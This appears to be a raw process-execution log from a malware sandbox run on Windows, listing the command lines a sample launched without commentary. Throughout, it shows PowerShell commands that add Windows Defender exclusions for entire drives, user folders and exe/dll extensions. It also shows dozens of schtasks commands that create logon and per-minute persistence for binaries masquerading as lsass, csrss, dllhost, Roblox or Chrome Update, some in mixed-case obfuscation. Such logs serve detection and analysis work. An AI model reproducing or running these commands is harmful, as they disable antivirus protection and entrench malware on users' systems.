"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\de-DE\WmiPrvSE.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KAuKjb5uOJ.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SysWOW64\msiexec.exe
"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\MsiExec.exe
C:\Windows\system32\MsiExec.exe -Embedding 85A41532DC1B4ED986F185DC47A3340F
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9924FCA711D0C7FDDBC022E9B16DDBDF
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 1548
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\winNet\lsass.exe'" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\winNet\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Documents\My Videos\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\eHome\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Journal\fr-FR\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\msiexec.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\msiexec.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 7 /tr "'C:\winNet\sddsfsdf.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 10 /tr "'C:\winNet\sddsfsdf.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents\My Videos\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\eHome\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\fr-FR\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\msiexec.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\dwm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\sddsfsdf.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vMNJbUnSbM.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
C:\winNet\ComContainerbrowserRefRuntime.exe
"C:\winNet/ComContainerbrowserRefRuntime.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9uqqWUlzO4.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
C:\DriversavessessionDlldhcp\Roblox.exe
"C:\DriversavessessionDlldhcp/Roblox.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\csrss.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4np3pl54\4np3pl54.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D5A.tmp" "c:\winNet\CSCA4C2121C24C74BF895E5B3D597394777.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mbi1aa25\mbi1aa25.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DE7.tmp" "c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcqkwtqq\lcqkwtqq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E54.tmp" "c:\Users\All Users\CSC95C42A624314BE78310BDEB9D835BA3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr1ppnnp\mr1ppnnp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F1F.tmp" "c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfzenaag\cfzenaag.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F6D.tmp" "c:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\CSC67F9D5D440504062ACE553C19FFDE5E4.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsormrob\bsormrob.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8028.tmp" "c:\winNet\CSC49D7F72528124E81B41D936BF212C46B.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gjjieqlg\gjjieqlg.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8095.tmp" "c:\winNet\CSC97D079D2907144CEAE72F4F99686E3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ho3etse\3ho3etse.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8102.tmp" "c:\winNet\CSC3992B8FD69D44AFFAB9FE267318D8677.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iuv4z3u2\iuv4z3u2.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES816F.tmp" "c:\Users\Admin\Documents\My Videos\CSC228DE5B123194A0D88E81292314E68A3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\isip5dhu\isip5dhu.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81CD.tmp" "c:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\CSCDD2E6DCB555746B4A413D5CFB027D2AA.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g4bqf3ev\g4bqf3ev.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8259.tmp" "c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\24qxckip\24qxckip.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82D6.tmp" "c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tggocznb\tggocznb.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8353.tmp" "c:\Users\All Users\Microsoft\eHome\CSC1ACF99C1ED05466F84E5BBE09011CE69.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nb1h5mye\nb1h5mye.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83D0.tmp" "c:\MSOCache\All Users\CSC12ACF0B35F3F40B39BFE2C5B4089659.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dimtaqxu\dimtaqxu.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES845C.tmp" "c:\DriversavessessionDlldhcp\CSCDB0D1EC529DA4CC8A5904E3928B049D7.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tec2jh3k\tec2jh3k.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D9.tmp" "c:\winNet\CSC50F968E876B4431CAAFB7131F4B618AD.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hu1aq3rt\hu1aq3rt.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8527.tmp" "c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1451802786-450524094-15654959291856616033-8165324015582428211873060891409845559"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1240033177-1087581127-52718330253047587052423637-105435632017827248901758497198"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "434171039490841803-659286136170842003317782336711507689689-864061186-1185069012"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "210418219-5002661294701329731368471238-522211457-8196399031202507616-1462984557"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NNPPtxWawv.bat"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "897362320-41934790-91102571416317546481911294881-9260774479988698511668435757"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
C:\Windows\system32\CMD.exe
"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
